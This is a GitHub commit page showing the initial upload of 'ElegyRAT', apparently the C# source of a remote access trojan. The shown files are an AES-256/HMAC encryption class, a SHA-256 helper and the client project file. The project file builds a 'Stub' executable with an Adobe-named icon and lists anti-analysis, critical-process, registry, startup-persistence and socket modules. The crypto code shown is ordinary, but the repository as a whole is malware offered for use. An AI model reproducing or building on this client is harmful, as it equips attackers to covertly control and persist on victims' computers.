Skip to content

Commit

Permalink
We1h0
Browse files Browse the repository at this point in the history 
Initial upload
  • Loading branch information
@we1h0
we1h0 committed Dec 30, 2020
1 parent 08e1203 commit a989e9c
Show file tree
Hide file tree
Showing 438 changed files with 45,678 additions and 0 deletions.
Binary file added ElegyRAT-C-Sharp/.vs/ElegyRAT-Sharp/v16/.suo
View file
Binary file not shown.
Binary file added ElegyRAT-C-Sharp/Client/2.ico
View file
Binary file not shown.
153 changes: 153 additions & 0 deletions ElegyRAT-C-Sharp/Client/Algorithm/Aes256.cs
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,153 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Security.Cryptography;
using System.Text;

namespace Client.Algorithm
{
public class Aes256
{
private const int KeyLength = 32;
private const int AuthKeyLength = 64;
private const int IvLength = 16;
private const int HmacSha256Length = 32;
private readonly byte[] _key;
private readonly byte[] _authKey;

private static readonly byte[] Salt =
{
0xBF, 0xEB, 0x1E, 0x56, 0xFB, 0xCD, 0x97, 0x3B, 0xB2, 0x19, 0x2, 0x24, 0x30, 0xA5, 0x78, 0x43, 0x0, 0x3D, 0x56,
0x44, 0xD2, 0x1E, 0x62, 0xB9, 0xD4, 0xF1, 0x80, 0xE7, 0xE6, 0xC3, 0x39, 0x41
};

public Aes256(string masterKey)
{
if (string.IsNullOrEmpty(masterKey))
throw new ArgumentException($"{nameof(masterKey)} can not be null or empty.");

using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(masterKey, Salt, 50000))
{
_key = derive.GetBytes(KeyLength);
_authKey = derive.GetBytes(AuthKeyLength);
}
}

public string Encrypt(string input)
{
return Convert.ToBase64String(Encrypt(Encoding.UTF8.GetBytes(input)));
}

/* FORMAT
* ----------------------------------------
* | HMAC | IV | CIPHERTEXT |
* ----------------------------------------
* 32 bytes 16 bytes
*/
public byte[] Encrypt(byte[] input)
{
if (input == null)
throw new ArgumentNullException($"{nameof(input)} can not be null.");

using (var ms = new MemoryStream())
{
ms.Position = HmacSha256Length; // reserve first 32 bytes for HMAC
using (var aesProvider = new AesCryptoServiceProvider())
{
aesProvider.KeySize = 256;
aesProvider.BlockSize = 128;
aesProvider.Mode = CipherMode.CBC;
aesProvider.Padding = PaddingMode.PKCS7;
aesProvider.Key = _key;
aesProvider.GenerateIV();

using (var cs = new CryptoStream(ms, aesProvider.CreateEncryptor(), CryptoStreamMode.Write))
{
ms.Write(aesProvider.IV, 0, aesProvider.IV.Length); // write next 16 bytes the IV, followed by ciphertext
cs.Write(input, 0, input.Length);
cs.FlushFinalBlock();

using (var hmac = new HMACSHA256(_authKey))
{
byte[] hash = hmac.ComputeHash(ms.ToArray(), HmacSha256Length, ms.ToArray().Length - HmacSha256Length); // compute the HMAC of IV and ciphertext
ms.Position = 0; // write hash at beginning
ms.Write(hash, 0, hash.Length);
}
}
}

return ms.ToArray();
}
}

public string Decrypt(string input)
{
return Encoding.UTF8.GetString(Decrypt(Convert.FromBase64String(input)));
}

public byte[] Decrypt(byte[] input)
{
if (input == null)
throw new ArgumentNullException($"{nameof(input)} can not be null.");

using (var ms = new MemoryStream(input))
{
using (var aesProvider = new AesCryptoServiceProvider())
{
aesProvider.KeySize = 256;
aesProvider.BlockSize = 128;
aesProvider.Mode = CipherMode.CBC;
aesProvider.Padding = PaddingMode.PKCS7;
aesProvider.Key = _key;

// read first 32 bytes for HMAC
using (var hmac = new HMACSHA256(_authKey))
{
var hash = hmac.ComputeHash(ms.ToArray(), HmacSha256Length, ms.ToArray().Length - HmacSha256Length);
byte[] receivedHash = new byte[HmacSha256Length];
ms.Read(receivedHash, 0, receivedHash.Length);

if (!AreEqual(hash, receivedHash))
throw new CryptographicException("Invalid message authentication code (MAC).");
}

byte[] iv = new byte[IvLength];
ms.Read(iv, 0, IvLength); // read next 16 bytes for IV, followed by ciphertext
aesProvider.IV = iv;

using (var cs = new CryptoStream(ms, aesProvider.CreateDecryptor(), CryptoStreamMode.Read))
{
byte[] temp = new byte[ms.Length - IvLength + 1];
byte[] data = new byte[cs.Read(temp, 0, temp.Length)];
Buffer.BlockCopy(temp, 0, data, 0, data.Length);
return data;
}
}
}
}

/// <summary>
/// Compares two byte arrays for equality.
/// </summary>
/// <param name="a1">Byte array to compare</param>
/// <param name="a2">Byte array to compare</param>
/// <returns>True if equal, else false</returns>
/// <remarks>
/// Assumes that the byte arrays have the same length.
/// This method is safe against timing attacks.
/// </remarks>
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
private bool AreEqual(byte[] a1, byte[] a2)
{
bool result = true;
for (int i = 0; i < a1.Length; ++i)
{
if (a1[i] != a2[i])
result = false;
}
return result;
}
}
}
33 changes: 33 additions & 0 deletions ElegyRAT-C-Sharp/Client/Algorithm/Sha256.cs
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
using System.Security.Cryptography;
using System.Text;

namespace Client.Algorithm
{
public static class Sha256
{
public static string ComputeHash(string input)
{
byte[] data = Encoding.UTF8.GetBytes(input);

using (SHA256Managed sha = new SHA256Managed())
{
data = sha.ComputeHash(data);
}

StringBuilder hash = new StringBuilder();

foreach (byte _byte in data)
hash.Append(_byte.ToString("X2"));

return hash.ToString().ToUpper();
}

public static byte[] ComputeHash(byte[] input)
{
using (SHA256Managed sha = new SHA256Managed())
{
return sha.ComputeHash(input);
}
}
}
}
167 changes: 167 additions & 0 deletions ElegyRAT-C-Sharp/Client/Client.csproj
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,167 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props" Condition="Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" />
<Import Project="..\packages\ILMerge.3.0.29\build\ILMerge.props" Condition="Exists('..\packages\ILMerge.3.0.29\build\ILMerge.props')" />
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{C3C49F45-2589-4E04-9C50-71B6035C14AE}</ProjectGuid>
<OutputType>WinExe</OutputType>
<RootNamespace>Client</RootNamespace>
<AssemblyName>Stub</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
<TargetFrameworkProfile>Client</TargetFrameworkProfile>
<IsWebBootstrapper>false</IsWebBootstrapper>
<NuGetPackageImportStamp>
</NuGetPackageImportStamp>
<PublishUrl>publish\</PublishUrl>
<Install>true</Install>
<InstallFrom>Disk</InstallFrom>
<UpdateEnabled>false</UpdateEnabled>
<UpdateMode>Foreground</UpdateMode>
<UpdateInterval>7</UpdateInterval>
<UpdateIntervalUnits>Days</UpdateIntervalUnits>
<UpdatePeriodically>false</UpdatePeriodically>
<UpdateRequired>false</UpdateRequired>
<MapFileExtensions>true</MapFileExtensions>
<ApplicationRevision>0</ApplicationRevision>
<ApplicationVersion>1.0.0.%2a</ApplicationVersion>
<UseApplicationTrust>false</UseApplicationTrust>
<BootstrapperEnabled>true</BootstrapperEnabled>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>x86</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>..\Binaries\Debug\Stub\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<DocumentationFile>
</DocumentationFile>
<AllowUnsafeBlocks>false</AllowUnsafeBlocks>
<GenerateSerializationAssemblies>Auto</GenerateSerializationAssemblies>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>x86</PlatformTarget>
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>..\Binaries\Release\Stub\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>false</AllowUnsafeBlocks>
<GenerateSerializationAssemblies>Auto</GenerateSerializationAssemblies>
<DebugSymbols>false</DebugSymbols>
</PropertyGroup>
<PropertyGroup>
<StartupObject />
</PropertyGroup>
<PropertyGroup />
<PropertyGroup>
<ApplicationManifest>app.manifest</ApplicationManifest>
</PropertyGroup>
<PropertyGroup>
<SignManifests>false</SignManifests>
</PropertyGroup>
<PropertyGroup>
<ManifestCertificateThumbprint>42D511BFB6981EC00B5DE797DBC5B50B8C1C9140</ManifestCertificateThumbprint>
</PropertyGroup>
<PropertyGroup>
<ManifestKeyFile>fql.pfx</ManifestKeyFile>
</PropertyGroup>
<PropertyGroup>
<SignAssembly>false</SignAssembly>
</PropertyGroup>
<PropertyGroup>
<AssemblyOriginatorKeyFile>
</AssemblyOriginatorKeyFile>
</PropertyGroup>
<PropertyGroup>
<ManifestTimestampUrl>http://timestamp.globalsign.com/scripts/timestamp.dll</ManifestTimestampUrl>
</PropertyGroup>
<PropertyGroup>
<ApplicationIcon>adobe_128px_1210214_easyicon.net.ico</ApplicationIcon>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="Microsoft.Win32.TaskScheduler, Version=2.9.0.0, Culture=neutral, PublicKeyToken=e25603a88b3aa7da, processorArchitecture=MSIL">
<HintPath>..\packages\TaskScheduler.2.9.0\lib\net40\Microsoft.Win32.TaskScheduler.dll</HintPath>
</Reference>
<Reference Include="System" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Drawing" />
<Reference Include="System.Management" />
<Reference Include="System.Security" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.XML" />
</ItemGroup>
<ItemGroup>
<Compile Include="Algorithm\Aes256.cs" />
<Compile Include="Algorithm\Sha256.cs" />
<Compile Include="Handle Packet\Packet.cs" />
<Compile Include="Helper\Anti_Analysis.cs" />
<Compile Include="Helper\HwidGen.cs" />
<Compile Include="Helper\IdSender.cs" />
<Compile Include="Helper\Methods.cs" />
<Compile Include="Helper\MutexControl.cs" />
<Compile Include="Helper\NativeMethods.cs" />
<Compile Include="Helper\ProcessCritical.cs" />
<Compile Include="Helper\SetRegistry.cs" />
<Compile Include="Install\NormalStartup.cs" />
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="Settings.cs" />
<Compile Include="Connection\ClientSocket.cs" />
</ItemGroup>
<ItemGroup>
<None Include="app.config" />
<None Include="app.manifest" />
<None Include="ILMerge.props" />
<None Include="packages.config" />
</ItemGroup>
<ItemGroup>
<BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
<Visible>False</Visible>
<ProductName>.NET Framework 3.5 SP1</ProductName>
<Install>false</Install>
</BootstrapperPackage>
</ItemGroup>
<ItemGroup>
<Content Include="2.ico" />
<Content Include="adobe_128px_1210214_easyicon.net.ico" />
<Content Include="ILMergeOrder.txt" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\MessagePack\MessagePackLib.csproj">
<Project>{dc199d9e-cf10-41dd-bbcd-98e71ba8679d}</Project>
<Name>MessagePackLib</Name>
</ProjectReference>
</ItemGroup>
<ItemGroup>
<COMReference Include="TaskScheduler">
<Guid>{E34CB9F1-C7F7-424C-BE29-027DCC09363A}</Guid>
<VersionMajor>1</VersionMajor>
<VersionMinor>0</VersionMinor>
<Lcid>0</Lcid>
<WrapperTool>tlbimp</WrapperTool>
<Isolated>False</Isolated>
<EmbedInteropTypes>True</EmbedInteropTypes>
</COMReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
<PropertyGroup>
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
</PropertyGroup>
<Error Condition="!Exists('..\packages\ILMerge.3.0.29\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\ILMerge.3.0.29\build\ILMerge.props'))" />
<Error Condition="!Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props'))" />
<Error Condition="!Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets'))" />
</Target>
<Import Project="..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets" Condition="Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" />
</Project>
13 changes: 13 additions & 0 deletions ElegyRAT-C-Sharp/Client/Client.csproj.user
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<PublishUrlHistory>publish\</PublishUrlHistory>
<InstallUrlHistory />
<SupportUrlHistory />
<UpdateUrlHistory />
<BootstrapperUrlHistory />
<ErrorReportUrlHistory />
<FallbackCulture>zh-CN</FallbackCulture>
<VerifyUploadedFiles>false</VerifyUploadedFiles>
</PropertyGroup>
</Project>
Loading

0 comments on commit a989e9c

Please sign in to comment.